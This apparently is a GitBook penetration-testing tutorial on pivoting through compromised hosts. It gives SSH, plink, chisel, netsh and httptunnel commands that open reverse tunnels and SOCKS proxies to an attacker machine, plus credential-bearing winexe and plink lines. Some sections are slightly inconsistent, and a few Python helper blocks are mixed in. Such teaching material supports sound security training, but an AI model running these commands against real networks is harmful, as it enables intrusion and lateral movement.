Powered by GitBook

Pivoting (Tunneling and Port Forwarding)

Pivoting

Pivoting is the art of using access obtained on one machine to exploit another machine, or set of machines, deeper in the network that may not be reachable from outside.

Types of Pivoting

There are generally two types of pivoting: tunneling and port forwarding.

  • Tunneling

  • Port Forwarding

Tunneling or Proxying

What's a proxy? A proxy is simply an intermediary server or system that sits between the user and the resource the user is trying to access. For example, if I want to visit facebook.com through a proxy, the proxy acts as a middleman: it first receives my request to visit facebook.com, retrieves the page on my behalf and sends it back to my computer.

Applied to pivoting: suppose we have compromised host 10.10.10.129, and this host can talk to another host 10.10.11.220 on a different internal subnet that is only reachable from that internal network. We can use the compromised host 10.10.10.129 as a proxy server and route all desired traffic through it to 10.10.11.220. A proxy is a good choice when we want to redirect many different kinds of traffic into the target network, or to reach multiple ports on multiple machines that the compromised host can talk to; the downside is that it can be a lot slower.

Port Forwarding

This is a technique where, after compromising a host, we create a connection between a local port and a single port of the target we want to reach, using the compromised host as the relay. It is fast and reliable and is usually the method of pivoting an attacker chooses.

Tools for Tunneling and Port Forwarding

  • SSH port forwarding and tunnelling (primarily Unix)

  • plink.exe (Windows)

  • socat (Windows and Unix)

  • chisel (Windows and Unix)

  • sshuttle (currently Unix only)

  • Uploading static nmap binary to scan the internal network

Enumerating a network for pivoting

The very first step of pivoting to another host, once we have compromised one, is to enumerate which hosts the compromised host is allowed to reach or talk to. After we have identified a candidate host using any of the steps below, we can simply ping it from the compromised host to see whether it is up.

Step 1

The first step of enumeration is always to run ipconfig /all on Windows or ifconfig -a on Linux to see whether the compromised host is physically, or by some other means, connected to other hosts in the network. If it is, we will see another IP address in the output; for example, if we have compromised host 10.10.10.11, run ipconfig /all and see the address 10.10.10.20, we know this machine is connected to the 10.10.10.20 machine and we can pivot into it.

Step 2

We can use the arp -a command on both Linux and Windows, which shows the IP addresses of any hosts the compromised host has interacted with recently.

Step 3

We can also check the /etc/hosts file on Linux and the C:\Windows\System32\drivers\etc\hosts file on Windows for any IP address other than our own.

Step 4

A simple bash one-liner can also enumerate the other hosts on the network that the compromised host can talk to. Suppose we have compromised host 10.10.10.12; the one-liner below pings every address from 10.10.10.1 to 10.10.10.255 from that host and prints only the ones that reply.

for i in {1..255}; do (ping -c 1 10.10.10.${i} | grep "bytes from" &); done

Static nmap binary

root@compromised-host:/dev/shm  ./nmap -v 10.11.17.0/24 --open

SSH Tunneling and Port Forwarding

If we have SSH access to a target host, say 10.10.11.12, and after running netstat -ano or ss -lntp we find an odd-looking port 8080 serving a web service that listens only on the target host itself, we can forward that port 8080 to our local machine as follows.

ssh -L 8080:127.0.0.1:8080 user@10.10.11.12 -fN 

After this we can simply navigate to http://127.0.0.1:8080 in a browser on our local machine.

  • Suppose we had SSH access on 10.10.10.12 and identified that our compromised host can talk to 10.10.10.20 on the internal network. After running an nmap scan against 10.10.10.20 from the compromised host we found it is running a web service on port 8000. To forward this port to our attacking machine we can do the following.

ssh -L 8000:10.10.10.20:8000 user@10.10.10.11 -fN

After this we can navigate to http://127.0.0.1:8000 on our own local machine and access that website.

SSH Dynamic Port Forwarding

In the examples above we were limited to forwarding a single port of a single host in the internal network. Dynamic port forwarding instead sets up a local listening port on the attacker's machine; when a request is made through this port (using proxychains), the connection is first forwarded to the compromised machine and from there to the chosen host on the internal network. For example: suppose we have SSH access to 10.10.11.129 and, after running ifconfig -a, we identify an additional network interface on 192.168.1.X that appears to be connected to a different network. After running the bash ping one-liner against the 255 hosts of the 192.168.1 network we identify two hosts, 192.168.1.110 and 192.168.1.220. Forwarding every single port of every identified host on the 192 network to our local machine one at a time would be almost impossible, or at least very time consuming, so in such cases we use SSH dynamic port forwarding.

  • First we setup a local listening port 8080 which will forward any request to 10.10.11.129 and then to our specified host on the internal 192 network.

sudo ssh -N -D 127.0.0.1:8080 user@10.10.11.129
  • Configure proxychains by pointing the SOCKS proxy in /etc/proxychains.conf at that port, as below.

kali@kali:~$ cat /etc/proxychains.conf
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 	127.0.0.1 8080
  • Now that we have identified hosts 192.168.1.110 and 192.168.1.220 on the internal network, we can interact with them from our own attacker box as below. The nmap, smbclient and ftp traffic first goes through 10.10.11.129 and from there to 192.168.1.110 and 192.168.1.220 on the internal network.

sudo proxychains nmap -sC -sV -sT -Pn 192.168.1.110
sudo proxychains smbclient -L //192.168.1.220
sudo proxychains ftp 192.168.1.110 21

Remote Port Forwarding (when we do not have SSH access on the target but have a shell)

SSH Remote Port Forwarding

  • Step 1 (On attacker machine)

ssh-keygen
  • Step 2 (On attacker machine) Now copy the content of id_rsa.pub into our own authorized_keys file, placing the following options at the start of the line so the key can only be used for port forwarding (no PTY, no agent or X11 forwarding, and a forced command instead of a shell):

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

Our authorized_keys file should now look something like this:

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa <public-key-material> lex@parrot
  • Step 3 (On attacker machine) Start the ssh server if not started

sudo systemctl start ssh
  • Step 4 (On victim machine) Now transfer our private key to the victim host where we have a stable shell. If we have a stable shell on victim host 10.10.10.112, and this host is internally connected to 10.10.11.120, which runs a web service on port 80, we run:

ssh -R 80:10.10.11.120:80 lex@<attacker-ip> -i id_rsa -fN

This opens port 80 on our attacker box and links our (attacker's) port 80 to the victim host 10.10.11.120:80 through 10.10.10.112 (the host where we have stable shell access).
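The option prefix above is what keeps that key from being used as anything other than a forwarding tunnel; the checker below is an added example (not part of the original notes) that parses an authorized_keys line and reports which of those restrictions are missing. The key material in its sample lines is a constructed placeholder, and the restrict/port-forwarding options it mentions are the newer OpenSSH equivalents of the same idea.

```python
"""Check an authorized_keys line for the notes' forwarding-only restrictions.
Added example, not from the original notes; sample lines are constructed and
the key material is a placeholder, not a real key."""

REQUIRED = {"command", "no-pty", "no-agent-forwarding", "no-x11-forwarding"}
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ssh-dss")

def option_prefix(line):
    """Options before the key, split on commas that are not inside double
    quotes (the command="..." value may itself contain commas and spaces)."""
    opts, cur, quoted = [], [], False
    for ch in line:
        quoted ^= ch == '"'
        if ch == " " and not quoted:
            break                      # first unquoted space ends the options
        if ch == "," and not quoted:
            opts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    return opts + ["".join(cur)]

def parse_options(line):
    """{option: value} for one authorized_keys line; a line that starts with
    a key type carries no options at all and yields an empty dict."""
    line = line.strip()
    if line.split(" ", 1)[0] in KEY_TYPES:
        return {}
    opts = {}
    for opt in option_prefix(line):
        name, _, value = opt.partition("=")
        opts[name.lower()] = value.strip('"')
    return opts

def missing_restrictions(line):
    """Sorted names of the restrictions a forwarding-only key still lacks.
    'restrict' (OpenSSH 7.2+) implies every no-* option but also disables
    forwarding, so a key using it must add 'port-forwarding' back."""
    present = set(parse_options(line))
    if "restrict" in present:
        present |= {"no-pty", "no-agent-forwarding", "no-x11-forwarding"}
    missing = REQUIRED - present
    if "restrict" in present and "port-forwarding" not in present:
        missing.add("port-forwarding")
    return sorted(missing)

# Constructed samples; "AAAA...NOTAREALKEY" stands in for the key material.
GOOD = ('command="echo \'This account can only be used for port forwarding\'",'
        'no-agent-forwarding,no-x11-forwarding,no-pty ssh-ed25519 AAAANOTAREALKEY lex@parrot')
BAD = 'ssh-ed25519 AAAANOTAREALKEY lex@parrot'
```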

plink.exe (Windows)

Same case as above: if we have a stable shell on a victim host but do not have SSH access, we can use statically compiled tools to achieve port forwarding, plink in this case.

plink.exe - Case 1 (forwarding a port that listens locally on the victim host to our machine)

Suppose 10.10.10.11 is our attacker's IP address and we need to forward port 3306 of the victim host to our attacker box. First we transfer the static plink.exe binary to the victim host; we also need an SSH server configured and running on our attacking box. Then we launch plink.exe on the victim machine as follows.

cmd.exe /c echo y | .\plink.exe -ssh -l <username> -pw <password> -R 10.10.10.11:3306:127.0.0.1:3306 10.10.10.11

plink.exe - Case 2 (forwarding a port of an internal host connected to our compromised host to our attacking machine)

Suppose we have compromised host 10.10.11.229, which is connected to another host 10.10.11.230 running a web server on port 8000, and our attacking host's IP is 192.168.55.229. After uploading the plink.exe binary to the compromised host 10.10.11.229, we first need to run an SSH server on our attacking machine 192.168.55.229 and prepare a key for plink:

  • Step 1 (Generate an SSH key on our attacking machine): ssh-keygen

  • Step 2 (Install the PuTTY tools on our attacking machine): sudo apt install putty-tools

  • Step 3 (Convert the id_rsa key file to PuTTY format): puttygen id_rsa -o id_rsa.ppk

  • Step 4 (chmod 600 the id_rsa.ppk file and send it to the victim host)

Now on victim host do the following

cmd.exe /c echo y | .\plink.exe -R 8000:10.10.11.230:8000 username@192.168.55.229 -i id_rsa.ppk -N

Plink.exe (Another Method):

  • We use plink.exe on Windows to forward a port of the victim machine that is listening internally to the same (or another) port on our attacker machine.

On the attacker PC: edit the SSH configuration in /etc/ssh/sshd_config, uncomment the PermitRootLogin line, set its value to yes and restart the SSH service. Note that this exposes the attacking box's root account to password logins from anyone who can reach it; the restricted-key approach in the SSH remote port forwarding section above avoids that. On the victim PC:

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.15.133
  • -l is the local username on our Kali box and -pw is the root password of our Kali box; we are forwarding port 445 of the victim machine to port 445 of our machine at 10.10.15.133 over SSH.

  • We may have to press the Enter key a couple of times for it to work.

  • We use winexe to execute commands on Windows from Linux. Suppose we have forwarded port 445 of the victim machine and have SMB credentials; on our Linux box we run:

winexe -U 'Administrator%Password1!' //192.168.1.225 "cmd.exe"

Chisel (Linux and Windows)

We need an appropriate copy of the chisel binary on both the attacking and the victim host.

On the attacking host:

./chisel server -p 8000 --reverse

On the victim host:

  • Connect to port 8000 on the attacker's server, open port 80 on the attacker's server and forward it to port 80 of the victim (this) machine

chisel client <attacker-ip>:8000 R:80:127.0.0.1:80
  • Connect to port 8000 on the attacker's server, open port 4444 on the attacker's server and forward it to port 80 of the internal host 10.10.10.240

chisel client <attacker-ip>:8000 R:4444:10.10.10.240:80
  • Connect to port 8000 on the attacker's server and create a SOCKS5 listener on port 1080 of the attacker's server

chisel client <attacker-ip>:8000 R:socks 
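Because ssh -L/-R/-D and chisel's R: specs all use the same port:host:hostport shape but put the listener on different ends, the following added example (not from the notes or from the OpenSSH/chisel projects) parses those specs and states which machine gains the listening socket and which one the forwarded connection leaves from. The defaults it assumes (ssh binds loopback; chisel binds 0.0.0.0 and uses 1080 for socks) are taken from the tools' documentation.

```python
"""Which machine gains a listening socket from a forward spec?
Added example, not from the original notes or from OpenSSH/chisel: parses the
ssh -L/-R/-D and chisel R:... arguments the notes use and reports where the
new listener appears and where its connections leave from. The defaults (ssh
binds loopback; chisel binds 0.0.0.0, socks on 1080) are assumptions."""

def split_spec(spec, default_bind):
    """'[bind:]port:host:hostport' -> (bind, port, host, hostport)."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts = [default_bind] + parts
    if len(parts) != 4:
        raise ValueError("bad forward spec: %r" % spec)
    return parts[0], int(parts[1]), parts[2], int(parts[3])

def ssh_forward(flag, spec, client_host, server_host):
    """flag 'L': listener on the host running ssh (client); 'R': listener on
    the sshd host (server); 'D': SOCKS listener on the client. 'egress' is
    the host from which the forwarded connection is actually made."""
    if flag == "D":
        bind, _, port = spec.rpartition(":")
        return {"listener": client_host, "bind": bind or "127.0.0.1",
                "port": int(port), "target": "socks", "egress": server_host}
    bind, port, host, hostport = split_spec(spec, "127.0.0.1")
    listener, egress = ((client_host, server_host) if flag == "L"
                        else (server_host, client_host))
    return {"listener": listener, "bind": bind, "port": port,
            "target": "%s:%d" % (host, hostport), "egress": egress}

def chisel_forward(spec, client_host, server_host):
    """chisel client <server> <spec>: an 'R:' prefix puts the listener on the
    chisel server (reverse); otherwise the listener is on the client."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    listener, egress = ((server_host, client_host) if reverse
                        else (client_host, server_host))
    if body == "socks":
        return {"listener": listener, "bind": "0.0.0.0", "port": 1080,
                "target": "socks", "egress": egress}
    bind, port, host, hostport = split_spec(body, "0.0.0.0")
    return {"listener": listener, "bind": bind, "port": port,
            "target": "%s:%d" % (host, hostport), "egress": egress}

if __name__ == "__main__":
    # The notes' ssh -R example runs on victim 10.10.10.112 towards the
    # attacker's sshd, so it is the attacker's box that starts listening.
    print(ssh_forward("R", "80:10.10.11.120:80", "10.10.10.112", "attacker"))
    print(chisel_forward("R:4444:10.10.10.240:80", "victim", "attacker"))
```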

ligolo-ng

Forwarding port 80 of an internal Windows host from a compromised Windows machine (compromised Windows = 10.10.11.1, internal Windows = 192.168.55.1)

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=10.10.11.1 connectport=80 connectaddress=192.168.55.1
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.10.11.1 localport=8080 action=allow

(listenport can be any port; listenaddress and localip are the compromised host 10.10.11.1; connectaddress is the internal host 192.168.55.1)

From attacker's server

nc -nvv 10.10.11.1 8080

(The connection is forwarded through 10.10.11.1 to port 80 of the internal Windows host 192.168.55.1.)

Accessing an internal Windows host through a compromised Windows host via SMB/CIFS

net use \\dc.internal.local\C$ /user:internal\<username> <pass>

Forwarding port 3389 (or any port) of an internal Windows host from a compromised Linux host (reached through an HTTP shell) where only ports 80, 443 and 1234 (or any chosen port) are allowed and remote SSH login is not allowed, but we have SSH credentials to the attacker's host, so that any traffic sent to a certain port on the attacker's host is forwarded to port 3389 of the internal Windows host

In attacker's host

sudo apt install httptunnel

In compromised linux host

ssh -L 0.0.0.0:8888:<internal-windows-host-ip>:3389 username@127.0.0.1

In compromised linux host

hts --forward-port localhost:8888 1234

In attacker's host

htc --forward-port 8080 <ip-of-compromised-linux-host>:1234

In attacker's host

rdesktop 127.0.0.1:8080

Last updated 1 year ago

After getting access on a host, e.g. 10.11.17.233, we can upload a static nmap binary (see the static-binaries link below) and scan for other hosts in the 10.11.17.0/24 subnet.

-> Static binaries for Linux and Windows, nmap among them: https://github.com/andrew-d/static-binaries

-> All-in-one pivoting, tunneling and lateral movement tool for Linux and Windows (ligolo-ng): https://github.com/nicocha30/ligolo-ng